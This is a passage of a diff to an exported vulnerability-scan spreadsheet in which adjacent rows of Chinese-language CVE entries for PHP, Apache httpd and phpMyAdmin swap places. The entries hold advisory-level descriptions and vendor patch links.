-          <t>PHP 5.6.26之前的ZIP签名验证功能和7.0.11之前的7.x不能确保uncompressed_filesize字段足够大，这使远程攻击者可以拒绝服务（越界内存访问）或通过精心制作的PHAR存档（与ext/phar/util.c和ext/phar/zip.c有关）具有其他未指定的影响。</t>
+          <t>PHP中的sapi/fpm/fpm/fpm_log.c文件中存在安全漏洞，该漏洞源于程序没有正确处理snprintf函数的返回值。攻击者可借助较长的字符串利用该漏洞获取进程内存中的敏感信息或造成拒绝服务（越边界读取和缓冲区溢出）。</t>
         </is>
       </c>
       <c r="G465" t="inlineStr">
@@ -56724,7 +56723,7 @@
       </c>
       <c r="J465" t="inlineStr">
         <is>
-          <t>CVE-2016-7414</t>
+          <t>CVE-2016-5114</t>
         </is>
       </c>
       <c r="K465" t="inlineStr">
@@ -56799,7 +56798,7 @@
     <row r="466">
       <c r="A466" t="inlineStr">
         <is>
-          <t>PHP 缓冲区溢出漏洞(CVE-2016-5114)</t>
+          <t>PHP 拒绝服务漏洞(CVE-2016-7414)</t>
         </is>
       </c>
       <c r="B466" t="inlineStr">
@@ -56814,17 +56813,18 @@
       </c>
       <c r="D466" t="inlineStr">
         <is>
-          <t>Buffer Overflow</t>
+          <t>DoS</t>
         </is>
       </c>
       <c r="E466" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://php.net/ChangeLog-5.php</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：
+http://php.net/ChangeLog-5.php</t>
         </is>
       </c>
       <c r="F466" t="inlineStr">
         <is>
-          <t>PHP中的sapi/fpm/fpm/fpm_log.c文件中存在安全漏洞，该漏洞源于程序没有正确处理snprintf函数的返回值。攻击者可借助较长的字符串利用该漏洞获取进程内存中的敏感信息或造成拒绝服务（越边界读取和缓冲区溢出）。</t>
+          <t>PHP 5.6.26之前的ZIP签名验证功能和7.0.11之前的7.x不能确保uncompressed_filesize字段足够大，这使远程攻击者可以拒绝服务（越界内存访问）或通过精心制作的PHAR存档（与ext/phar/util.c和ext/phar/zip.c有关）具有其他未指定的影响。</t>
         </is>
       </c>
       <c r="G466" t="inlineStr">
@@ -56844,7 +56844,7 @@
       </c>
       <c r="J466" t="inlineStr">
         <is>
-          <t>CVE-2016-5114</t>
+          <t>CVE-2016-7414</t>
         </is>
       </c>
       <c r="K466" t="inlineStr">
@@ -56919,7 +56919,7 @@
     <row r="467">
       <c r="A467" t="inlineStr">
         <is>
-          <t>PHP 安全漏洞(CVE-2016-4071)</t>
+          <t>PHP gd.c缓冲区溢出漏洞(CVE-2016-7126)</t>
         </is>
       </c>
       <c r="B467" t="inlineStr">
@@ -56934,18 +56934,17 @@
       </c>
       <c r="D467" t="inlineStr">
         <is>
-          <t>Other</t>
+          <t>Buffer Overflow</t>
         </is>
       </c>
       <c r="E467" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：
-https://git.php.net/?p=php-src.git;a=commit;h=6e25966544fb1d2f3d7596e060ce9c9269bbdcf8</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://www.php.net/ChangeLog-7.php</t>
         </is>
       </c>
       <c r="F467" t="inlineStr">
         <is>
-          <t>PHP的ext/snmp/snmp.c文件中的‘php_snmp_error’函数存在格式化字符串漏洞。远程攻击者可借助SNMP：：get调用中的格式化字符串说明符利用该漏洞执行任意代码。以下版本受到影响：PHP 5.5.34之前版本，5.6.20之前5.6.x版本，7.0.5之前7.x版本。</t>
+          <t>PHP 5.6.25之前的ext/gd/gd.c中的imagetruecolortopalette函数以及7.0.10之前的7.x中的imagetruecolortopalette函数无法正确验证颜色数量，这使远程攻击者可能导致拒绝服务（select_colors分配错误并出边界写入），或者通过第三个参数中的较大值可能具有未指定的其他影响。</t>
         </is>
       </c>
       <c r="G467" t="inlineStr">
@@ -56965,7 +56964,7 @@
       </c>
       <c r="J467" t="inlineStr">
         <is>
-          <t>CVE-2016-4071</t>
+          <t>CVE-2016-7126</t>
         </is>
       </c>
       <c r="K467" t="inlineStr">
@@ -57040,7 +57039,7 @@
     <row r="468">
       <c r="A468" t="inlineStr">
         <is>
-          <t>PHP gd.c缓冲区溢出漏洞(CVE-2016-7126)</t>
+          <t>PHP 安全漏洞(CVE-2016-4071)</t>
         </is>
       </c>
       <c r="B468" t="inlineStr">
@@ -57055,17 +57054,18 @@
       </c>
       <c r="D468" t="inlineStr">
         <is>
-          <t>Buffer Overflow</t>
+          <t>Other</t>
         </is>
       </c>
       <c r="E468" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://www.php.net/ChangeLog-7.php</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：
+https://git.php.net/?p=php-src.git;a=commit;h=6e25966544fb1d2f3d7596e060ce9c9269bbdcf8</t>
         </is>
       </c>
       <c r="F468" t="inlineStr">
         <is>
-          <t>PHP 5.6.25之前的ext/gd/gd.c中的imagetruecolortopalette函数以及7.0.10之前的7.x中的imagetruecolortopalette函数无法正确验证颜色数量，这使远程攻击者可能导致拒绝服务（select_colors分配错误并出边界写入），或者通过第三个参数中的较大值可能具有未指定的其他影响。</t>
+          <t>PHP的ext/snmp/snmp.c文件中的‘php_snmp_error’函数存在格式化字符串漏洞。远程攻击者可借助SNMP：：get调用中的格式化字符串说明符利用该漏洞执行任意代码。以下版本受到影响：PHP 5.5.34之前版本，5.6.20之前5.6.x版本，7.0.5之前7.x版本。</t>
         </is>
       </c>
       <c r="G468" t="inlineStr">
@@ -57085,7 +57085,7 @@
       </c>
       <c r="J468" t="inlineStr">
         <is>
-          <t>CVE-2016-7126</t>
+          <t>CVE-2016-4071</t>
         </is>
       </c>
       <c r="K468" t="inlineStr">
@@ -57401,7 +57401,7 @@
     <row r="471">
       <c r="A471" t="inlineStr">
         <is>
-          <t>PHP mbstring扩展整数溢出漏洞(CVE-2016-5768)</t>
+          <t>PHP WDDX扩展双重释放任意代码执行漏洞(CVE-2016-5772)</t>
         </is>
       </c>
       <c r="B471" t="inlineStr">
@@ -57416,17 +57416,19 @@
       </c>
       <c r="D471" t="inlineStr">
         <is>
-          <t>Integer Overflow</t>
+          <t>Code Execution</t>
         </is>
       </c>
       <c r="E471" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://www.php.net/ChangeLog-7.phphttp://www.php.net/ChangeLog-5.php</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：
+http://php.net/ChangeLog-5.php
+http://php.net/ChangeLog-7.php</t>
         </is>
       </c>
       <c r="F471" t="inlineStr">
         <is>
-          <t>5.5.37之前，PHP 5.6.23之前的5.6.x和7.0.8之前的7.x中的mbstring扩展的php_mbregex.c中php_mbregex.c的_php_mb_regex_ereg_replace_exec函数中的双重释放漏洞允许远程攻击者执行任意代码或导致拒绝通过利用回调异常来实现服务（应用程序崩溃）。</t>
+          <t>PHP中的WDDX扩展中的wddx.c文件中的‘php_wddx_process_data ’函数存在双重释放漏洞，该漏洞源于程序没有正确处理wddx_deserialize调用。远程攻击者可借助特制的XML数据利用该漏洞造成拒绝服务（应用程序崩溃），或执行任意代码。</t>
         </is>
       </c>
       <c r="G471" t="inlineStr">
@@ -57446,7 +57448,7 @@
       </c>
       <c r="J471" t="inlineStr">
         <is>
-          <t>CVE-2016-5768</t>
+          <t>CVE-2016-5772</t>
         </is>
       </c>
       <c r="K471" t="inlineStr">
@@ -57521,7 +57523,7 @@
     <row r="472">
       <c r="A472" t="inlineStr">
         <is>
-          <t>PHP WDDX扩展双重释放任意代码执行漏洞(CVE-2016-5772)</t>
+          <t>PHP mbstring扩展整数溢出漏洞(CVE-2016-5768)</t>
         </is>
       </c>
       <c r="B472" t="inlineStr">
@@ -57536,19 +57538,17 @@
       </c>
       <c r="D472" t="inlineStr">
         <is>
-          <t>Code Execution</t>
+          <t>Integer Overflow</t>
         </is>
       </c>
       <c r="E472" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：
-http://php.net/ChangeLog-5.php
-http://php.net/ChangeLog-7.php</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://www.php.net/ChangeLog-7.phphttp://www.php.net/ChangeLog-5.php</t>
         </is>
       </c>
       <c r="F472" t="inlineStr">
         <is>
-          <t>PHP中的WDDX扩展中的wddx.c文件中的‘php_wddx_process_data ’函数存在双重释放漏洞，该漏洞源于程序没有正确处理wddx_deserialize调用。远程攻击者可借助特制的XML数据利用该漏洞造成拒绝服务（应用程序崩溃），或执行任意代码。</t>
+          <t>5.5.37之前，PHP 5.6.23之前的5.6.x和7.0.8之前的7.x中的mbstring扩展的php_mbregex.c中php_mbregex.c的_php_mb_regex_ereg_replace_exec函数中的双重释放漏洞允许远程攻击者执行任意代码或导致拒绝通过利用回调异常来实现服务（应用程序崩溃）。</t>
         </is>
       </c>
       <c r="G472" t="inlineStr">
@@ -57568,7 +57568,7 @@
       </c>
       <c r="J472" t="inlineStr">
         <is>
-          <t>CVE-2016-5772</t>
+          <t>CVE-2016-5768</t>
         </is>
       </c>
       <c r="K472" t="inlineStr">
@@ -58364,7 +58364,7 @@
     <row r="479">
       <c r="A479" t="inlineStr">
         <is>
-          <t>PHP  ftp_genlist()函数整数溢出漏洞(CVE-2015-4643)</t>
+          <t>Php 命令注入漏洞(CVE-2015-4642)</t>
         </is>
       </c>
       <c r="B479" t="inlineStr">
@@ -58379,17 +58379,17 @@
       </c>
       <c r="D479" t="inlineStr">
         <is>
-          <t>Buffer Overflow</t>
+          <t>Command Execution</t>
         </is>
       </c>
       <c r="E479" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://bugs.php.net/bug.php?id=69545</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://bugs.php.net/bug.php?id=69646</t>
         </is>
       </c>
       <c r="F479" t="inlineStr">
         <is>
-          <t>PHP的ext/ftp/ftp.c中的ftp_genlist函数中的整数溢出在5.4.42之前的PHP，5.5.26之前的5.5.x和5.6.10之前的5.6.x允许远程FTP服务器通过对以下内容的长回复执行任意代码LIST命令，导致基于堆的缓冲区溢出。注意：此漏洞存在是由于对CVE-2015-4022的修复不完整。</t>
+          <t>Windows上5.4.42之前的PHP，ext.standard/exec.c中的escapeshellarg函数，Windows 5.5.26之前的5.5.x和5.6.10之前的5.6.x允许远程攻击者通过精心设计的字符串来接受命令行参数以调用PHP系统函数的应用程序。</t>
         </is>
       </c>
       <c r="G479" t="inlineStr">
@@ -58409,7 +58409,7 @@
       </c>
       <c r="J479" t="inlineStr">
         <is>
-          <t>CVE-2015-4643</t>
+          <t>CVE-2015-4642</t>
         </is>
       </c>
       <c r="K479" t="inlineStr">
@@ -58484,7 +58484,7 @@
     <row r="480">
       <c r="A480" t="inlineStr">
         <is>
-          <t>Php 命令注入漏洞(CVE-2015-4642)</t>
+          <t>PHP  ftp_genlist()函数整数溢出漏洞(CVE-2015-4643)</t>
         </is>
       </c>
       <c r="B480" t="inlineStr">
@@ -58499,17 +58499,17 @@
       </c>
       <c r="D480" t="inlineStr">
         <is>
-          <t>Command Execution</t>
+          <t>Buffer Overflow</t>
         </is>
       </c>
       <c r="E480" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://bugs.php.net/bug.php?id=69646</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://bugs.php.net/bug.php?id=69545</t>
         </is>
       </c>
       <c r="F480" t="inlineStr">
         <is>
-          <t>Windows上5.4.42之前的PHP，ext.standard/exec.c中的escapeshellarg函数，Windows 5.5.26之前的5.5.x和5.6.10之前的5.6.x允许远程攻击者通过精心设计的字符串来接受命令行参数以调用PHP系统函数的应用程序。</t>
+          <t>PHP的ext/ftp/ftp.c中的ftp_genlist函数中的整数溢出在5.4.42之前的PHP，5.5.26之前的5.5.x和5.6.10之前的5.6.x允许远程FTP服务器通过对以下内容的长回复执行任意代码LIST命令，导致基于堆的缓冲区溢出。注意：此漏洞存在是由于对CVE-2015-4022的修复不完整。</t>
         </is>
       </c>
       <c r="G480" t="inlineStr">
@@ -58529,7 +58529,7 @@
       </c>
       <c r="J480" t="inlineStr">
         <is>
-          <t>CVE-2015-4642</t>
+          <t>CVE-2015-4643</t>
         </is>
       </c>
       <c r="K480" t="inlineStr">

--- a/tmp/exports/vuln_测试001_2026-05-31_2026-06-29.xlsx
+++ b/tmp/exports/vuln_测试001_2026-05-31_2026-06-29.xlsx
@@ -3129,7 +3129,7 @@
     <row r="23">
       <c r="A23" t="inlineStr">
         <is>
-          <t>Apache httpd 安全漏洞(CVE-2017-3169)</t>
+          <t>Apache Httpd 安全漏洞(CVE-2017-3167)</t>
         </is>
       </c>
       <c r="B23" t="inlineStr">
@@ -3149,12 +3149,12 @@
       </c>
       <c r="E23" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://lists.apache.org/thread.html/84bf7fcc5cad35d355f11839cbdd13cbc5ffc1d34675090bff0f96ae@%3Cdev.httpd.apache.org%3E</t>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://lists.apache.org/thread.html/8409e41a8f7dd9ded37141c38df001be930115428c3d64f70bbdb8b4@%3Cdev.httpd.apache.org%3E</t>
         </is>
       </c>
       <c r="F23" t="inlineStr">
         <is>
-          <t>Apache httpd 2.2.x 至2.2.33之前的版本，2.4.x至2.4.26之前的版本存在安全漏洞，当HTTP请求HTTPS端口时，使用第三方模块调用ap_hook_process_connection()，mod_ssl会触发空指针引用。</t>
+          <t>Apache HTTP Server是Apache软件基金会的一个开放源代码的网页服务器，可以在大多数电脑操作系统中运行，由于其具有的跨平台性和安全性，被广泛使用，是最流行的Web服务器端软件之一。Apache httpd 2.2.x 至2.2.33之前的版本，2.4.x至2.4.26之前的版本存在安全漏洞，通过认证阶段外的第三方模块使用ap_get_basic_auth_pw()功能能够导致认证绕过。</t>
         </is>
       </c>
       <c r="G23" t="inlineStr">
@@ -3174,7 +3174,7 @@
       </c>
       <c r="J23" t="inlineStr">
         <is>
-          <t>CVE-2017-3169</t>
+          <t>CVE-2017-3167</t>
         </is>
       </c>
       <c r="K23" t="inlineStr">
@@ -3249,7 +3249,7 @@
     <row r="24">
       <c r="A24" t="inlineStr">
         <is>
-          <t>Apache Httpd 安全漏洞(CVE-2017-3167)</t>
+          <t>Apache httpd 安全漏洞(CVE-2017-3169)</t>
         </is>
       </c>
       <c r="B24" t="inlineStr">
@@ -3269,12 +3269,12 @@
       </c>
       <c r="E24" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://lists.apache.org/thread.html/8409e41a8f7dd9ded37141c38df001be930115428c3d64f70bbdb8b4@%3Cdev.httpd.apache.org%3E</t>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://lists.apache.org/thread.html/84bf7fcc5cad35d355f11839cbdd13cbc5ffc1d34675090bff0f96ae@%3Cdev.httpd.apache.org%3E</t>
         </is>
       </c>
       <c r="F24" t="inlineStr">
         <is>
-          <t>Apache HTTP Server是Apache软件基金会的一个开放源代码的网页服务器，可以在大多数电脑操作系统中运行，由于其具有的跨平台性和安全性，被广泛使用，是最流行的Web服务器端软件之一。Apache httpd 2.2.x 至2.2.33之前的版本，2.4.x至2.4.26之前的版本存在安全漏洞，通过认证阶段外的第三方模块使用ap_get_basic_auth_pw()功能能够导致认证绕过。</t>
+          <t>Apache httpd 2.2.x 至2.2.33之前的版本，2.4.x至2.4.26之前的版本存在安全漏洞，当HTTP请求HTTPS端口时，使用第三方模块调用ap_hook_process_connection()，mod_ssl会触发空指针引用。</t>
         </is>
       </c>
       <c r="G24" t="inlineStr">
@@ -3294,7 +3294,7 @@
       </c>
       <c r="J24" t="inlineStr">
         <is>
-          <t>CVE-2017-3167</t>
+          <t>CVE-2017-3169</t>
         </is>
       </c>
       <c r="K24" t="inlineStr">
@@ -9054,7 +9054,7 @@
     <row r="72">
       <c r="A72" t="inlineStr">
         <is>
-          <t>Apache HTTP Server 环境问题漏洞(CVE-2022-22720)</t>
+          <t>Apache HTTP Server X-Forwarded-For绕过漏洞(CVE-2022-31813)</t>
         </is>
       </c>
       <c r="B72" t="inlineStr">
@@ -9069,18 +9069,18 @@
       </c>
       <c r="D72" t="inlineStr">
         <is>
-          <t>other environmental issues</t>
+          <t>Authentication Vulnerability</t>
         </is>
       </c>
       <c r="E72" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： ", "https://httpd.apache.org/security/vulnerabilities_24.html</t>
+          <t>当前官方已发布最新版本，建议受影响的用户及时更新到最新版本。链接如下：
+https://httpd.apache.org/download.cgi</t>
         </is>
       </c>
       <c r="F72" t="inlineStr">
         <is>
-          <t>Apache HTTP Server是美国阿帕奇（Apache）基金会的一款开源网页服务器。该服务器具有快速、可靠且可通过简单的API进行扩充的特点。 
-Apache HTTP Server 存在环境问题漏洞，该漏洞源于 Apache HTTP Server 在丢弃请求正文时无法关闭入站连接，从而导致请求夹带（request smuggling）。</t>
+          <t>Apache HTTP Server 2.4.53 及更早版本可能不会基于客户端连接头逐跳机制将 X-Forwarded-* 头发送到源服务器。</t>
         </is>
       </c>
       <c r="G72" t="inlineStr">
@@ -9100,7 +9100,7 @@
       </c>
       <c r="J72" t="inlineStr">
         <is>
-          <t>CVE-2022-22720</t>
+          <t>CVE-2022-31813</t>
         </is>
       </c>
       <c r="K72" t="inlineStr">
@@ -9175,7 +9175,7 @@
     <row r="73">
       <c r="A73" t="inlineStr">
         <is>
-          <t>Apache HTTP Server X-Forwarded-For绕过漏洞(CVE-2022-31813)</t>
+          <t>Apache HTTP Server 环境问题漏洞(CVE-2022-22720)</t>
         </is>
       </c>
       <c r="B73" t="inlineStr">
@@ -9190,18 +9190,18 @@
       </c>
       <c r="D73" t="inlineStr">
         <is>
-          <t>Authentication Vulnerability</t>
+          <t>other environmental issues</t>
         </is>
       </c>
       <c r="E73" t="inlineStr">
         <is>
-          <t>当前官方已发布最新版本，建议受影响的用户及时更新到最新版本。链接如下：
-https://httpd.apache.org/download.cgi</t>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： ", "https://httpd.apache.org/security/vulnerabilities_24.html</t>
         </is>
       </c>
       <c r="F73" t="inlineStr">
         <is>
-          <t>Apache HTTP Server 2.4.53 及更早版本可能不会基于客户端连接头逐跳机制将 X-Forwarded-* 头发送到源服务器。</t>
+          <t>Apache HTTP Server是美国阿帕奇（Apache）基金会的一款开源网页服务器。该服务器具有快速、可靠且可通过简单的API进行扩充的特点。 
+Apache HTTP Server 存在环境问题漏洞，该漏洞源于 Apache HTTP Server 在丢弃请求正文时无法关闭入站连接，从而导致请求夹带（request smuggling）。</t>
         </is>
       </c>
       <c r="G73" t="inlineStr">
@@ -9221,7 +9221,7 @@
       </c>
       <c r="J73" t="inlineStr">
         <is>
-          <t>CVE-2022-31813</t>
+          <t>CVE-2022-22720</t>
         </is>
       </c>
       <c r="K73" t="inlineStr">
@@ -11222,7 +11222,7 @@
     <row r="90">
       <c r="A90" t="inlineStr">
         <is>
-          <t>phpMyAdmin SQL注入漏洞(CVE-2019-18622)</t>
+          <t>phpMyAdmin SQL注入漏洞(CVE-2019-11768)</t>
         </is>
       </c>
       <c r="B90" t="inlineStr">
@@ -11242,18 +11242,18 @@
       </c>
       <c r="E90" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：
-https://www. phpMyAdmin.net/security/PMASA-2019-5/</t>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：
+https://www.phpmyadmin.net/security/PMASA-2019-3/</t>
         </is>
       </c>
       <c r="F90" t="inlineStr">
         <is>
-          <t>phpMyAdmin是 phpMyAdmin团队的一套免费的、基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库，创建、删除、修改数据库表，执行SQL脚本命令等。 phpMyAdmin 4.9.2之前版本中存在SQL注入漏洞。该漏洞源于基于数据库的应用缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令。</t>
+          <t>phpMyAdmin 4.9.0.1之前版本中存在SQL注入漏洞。该漏洞源于基于数据库的应用缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令。</t>
         </is>
       </c>
       <c r="G90" t="inlineStr">
         <is>
-          <t>Vuln with Attack Code Disclosure、Highly Exploitable Vuln</t>
+          <t>Vuln with Attack Code Disclosure</t>
         </is>
       </c>
       <c r="H90" t="inlineStr">
@@ -11268,7 +11268,7 @@
       </c>
       <c r="J90" t="inlineStr">
         <is>
-          <t>CVE-2019-18622</t>
+          <t>CVE-2019-11768</t>
         </is>
       </c>
       <c r="K90" t="inlineStr">
@@ -11343,7 +11343,7 @@
     <row r="91">
       <c r="A91" t="inlineStr">
         <is>
-          <t>phpMyAdmin SQL注入漏洞(CVE-2019-11768)</t>
+          <t>phpMyAdmin SQL注入漏洞(CVE-2019-18622)</t>
         </is>
       </c>
       <c r="B91" t="inlineStr">
@@ -11363,18 +11363,18 @@
       </c>
       <c r="E91" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：
-https://www.phpmyadmin.net/security/PMASA-2019-3/</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：
+https://www. phpMyAdmin.net/security/PMASA-2019-5/</t>
         </is>
       </c>
       <c r="F91" t="inlineStr">
         <is>
-          <t>phpMyAdmin 4.9.0.1之前版本中存在SQL注入漏洞。该漏洞源于基于数据库的应用缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令。</t>
+          <t>phpMyAdmin是 phpMyAdmin团队的一套免费的、基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库，创建、删除、修改数据库表，执行SQL脚本命令等。 phpMyAdmin 4.9.2之前版本中存在SQL注入漏洞。该漏洞源于基于数据库的应用缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令。</t>
         </is>
       </c>
       <c r="G91" t="inlineStr">
         <is>
-          <t>Vuln with Attack Code Disclosure</t>
+          <t>Vuln with Attack Code Disclosure、Highly Exploitable Vuln</t>
         </is>
       </c>
       <c r="H91" t="inlineStr">
@@ -11389,7 +11389,7 @@
       </c>
       <c r="J91" t="inlineStr">
         <is>
-          <t>CVE-2019-11768</t>
+          <t>CVE-2019-18622</t>
         </is>
       </c>
       <c r="K91" t="inlineStr">
@@ -14236,7 +14236,7 @@
     <row r="115">
       <c r="A115" t="inlineStr">
         <is>
-          <t>Apache HTTP Server X-Forwarded-For绕过漏洞(CVE-2022-31813)</t>
+          <t>Apache HTTP Server 环境问题漏洞(CVE-2022-22720)</t>
         </is>
       </c>
       <c r="B115" t="inlineStr">
@@ -14251,18 +14251,18 @@
       </c>
       <c r="D115" t="inlineStr">
         <is>
-          <t>Authentication Vulnerability</t>
+          <t>other environmental issues</t>
         </is>
       </c>
       <c r="E115" t="inlineStr">
         <is>
-          <t>当前官方已发布最新版本，建议受影响的用户及时更新到最新版本。链接如下：
-https://httpd.apache.org/download.cgi</t>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： ", "https://httpd.apache.org/security/vulnerabilities_24.html</t>
         </is>
       </c>
       <c r="F115" t="inlineStr">
         <is>
-          <t>Apache HTTP Server 2.4.53 及更早版本可能不会基于客户端连接头逐跳机制将 X-Forwarded-* 头发送到源服务器。</t>
+          <t>Apache HTTP Server是美国阿帕奇（Apache）基金会的一款开源网页服务器。该服务器具有快速、可靠且可通过简单的API进行扩充的特点。 
+Apache HTTP Server 存在环境问题漏洞，该漏洞源于 Apache HTTP Server 在丢弃请求正文时无法关闭入站连接，从而导致请求夹带（request smuggling）。</t>
         </is>
       </c>
       <c r="G115" t="inlineStr">
@@ -14282,7 +14282,7 @@
       </c>
       <c r="J115" t="inlineStr">
         <is>
-          <t>CVE-2022-31813</t>
+          <t>CVE-2022-22720</t>
         </is>
       </c>
       <c r="K115" t="inlineStr">
@@ -14357,7 +14357,7 @@
     <row r="116">
       <c r="A116" t="inlineStr">
         <is>
-          <t>Apache HTTP Server 环境问题漏洞(CVE-2022-22720)</t>
+          <t>Apache HTTP Server X-Forwarded-For绕过漏洞(CVE-2022-31813)</t>
         </is>
       </c>
       <c r="B116" t="inlineStr">
@@ -14372,18 +14372,18 @@
       </c>
       <c r="D116" t="inlineStr">
         <is>
-          <t>other environmental issues</t>
+          <t>Authentication Vulnerability</t>
         </is>
       </c>
       <c r="E116" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： ", "https://httpd.apache.org/security/vulnerabilities_24.html</t>
+          <t>当前官方已发布最新版本，建议受影响的用户及时更新到最新版本。链接如下：
+https://httpd.apache.org/download.cgi</t>
         </is>
       </c>
       <c r="F116" t="inlineStr">
         <is>
-          <t>Apache HTTP Server是美国阿帕奇（Apache）基金会的一款开源网页服务器。该服务器具有快速、可靠且可通过简单的API进行扩充的特点。 
-Apache HTTP Server 存在环境问题漏洞，该漏洞源于 Apache HTTP Server 在丢弃请求正文时无法关闭入站连接，从而导致请求夹带（request smuggling）。</t>
+          <t>Apache HTTP Server 2.4.53 及更早版本可能不会基于客户端连接头逐跳机制将 X-Forwarded-* 头发送到源服务器。</t>
         </is>
       </c>
       <c r="G116" t="inlineStr">
@@ -14403,7 +14403,7 @@
       </c>
       <c r="J116" t="inlineStr">
         <is>
-          <t>CVE-2022-22720</t>
+          <t>CVE-2022-31813</t>
         </is>
       </c>
       <c r="K116" t="inlineStr">
@@ -18713,7 +18713,7 @@
     <row r="152">
       <c r="A152" t="inlineStr">
         <is>
-          <t>PHP GD Graphics Library 缓冲区错误漏洞(CVE-2016-8670)</t>
+          <t>PHP 缓冲区错误漏洞(CVE-2017-12933)</t>
         </is>
       </c>
       <c r="B152" t="inlineStr">
@@ -18733,13 +18733,13 @@
       </c>
       <c r="E152" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：
-http://www.php.net/ChangeLog-7.php</t>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：
+http://php.net/ChangeLog-5.php</t>
         </is>
       </c>
       <c r="F152" t="inlineStr">
         <is>
-          <t>PHP（PHP：Hypertext Preprocessor，PHP：超文本预处理器）是PHP Group和开放源代码社区共同维护的一种开源的通用计算机脚本语言。该语言主要用于Web开发，支持多种数据库及操作系统。GD Graphics Library（又名libgd或libgd2）是美国软件开发者Thomas Boutell所研发的一个开源的用于动态创建图像的库，它支持创建图表、图形和缩略图等。PHP 5.6.28之前的版本和7.0.13之前的的7.x版本的GD Graphics Library 2.2.3及之前的版本中的gd_io_dp.c文件的‘dynamicGetbuf’函数存在整数符号错误漏洞。远程攻击者可借助特制的imagecreatefromstring调用利用该漏洞造成拒绝服务（基于栈的缓冲区溢出）。</t>
+          <t>PHP（PHP：Hypertext Preprocessor，PHP：超文本预处理器）是PHP Group和开放源代码社区共同维护的一种开源的通用计算机脚本语言。该语言主要用于Web开发，支持多种数据库及操作系统。PHP中的ext/standard/var_unserializer.re的‘finish_nested_data’函数存在缓冲区溢出漏洞。攻击者可利用该漏洞执行任意代码或造成拒绝服务。以下版本受到影响：PHP 5.6.31之前的版本，7.0.21之前的7.0.x版本，7.1.7之前的7.1.x版本。</t>
         </is>
       </c>
       <c r="G152" t="inlineStr">
@@ -18759,7 +18759,7 @@
       </c>
       <c r="J152" t="inlineStr">
         <is>
-          <t>CVE-2016-8670</t>
+          <t>CVE-2017-12933</t>
         </is>
       </c>
       <c r="K152" t="inlineStr">
@@ -18834,7 +18834,7 @@
     <row r="153">
       <c r="A153" t="inlineStr">
         <is>
-          <t>PHP 缓冲区错误漏洞(CVE-2017-12933)</t>
+          <t>PHP GD Graphics Library 缓冲区错误漏洞(CVE-2016-8670)</t>
         </is>
       </c>
       <c r="B153" t="inlineStr">
@@ -18854,13 +18854,13 @@
       </c>
       <c r="E153" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：
-http://php.net/ChangeLog-5.php</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：
+http://www.php.net/ChangeLog-7.php</t>
         </is>
       </c>
       <c r="F153" t="inlineStr">
         <is>
-          <t>PHP（PHP：Hypertext Preprocessor，PHP：超文本预处理器）是PHP Group和开放源代码社区共同维护的一种开源的通用计算机脚本语言。该语言主要用于Web开发，支持多种数据库及操作系统。PHP中的ext/standard/var_unserializer.re的‘finish_nested_data’函数存在缓冲区溢出漏洞。攻击者可利用该漏洞执行任意代码或造成拒绝服务。以下版本受到影响：PHP 5.6.31之前的版本，7.0.21之前的7.0.x版本，7.1.7之前的7.1.x版本。</t>
+          <t>PHP（PHP：Hypertext Preprocessor，PHP：超文本预处理器）是PHP Group和开放源代码社区共同维护的一种开源的通用计算机脚本语言。该语言主要用于Web开发，支持多种数据库及操作系统。GD Graphics Library（又名libgd或libgd2）是美国软件开发者Thomas Boutell所研发的一个开源的用于动态创建图像的库，它支持创建图表、图形和缩略图等。PHP 5.6.28之前的版本和7.0.13之前的的7.x版本的GD Graphics Library 2.2.3及之前的版本中的gd_io_dp.c文件的‘dynamicGetbuf’函数存在整数符号错误漏洞。远程攻击者可借助特制的imagecreatefromstring调用利用该漏洞造成拒绝服务（基于栈的缓冲区溢出）。</t>
         </is>
       </c>
       <c r="G153" t="inlineStr">
@@ -18880,7 +18880,7 @@
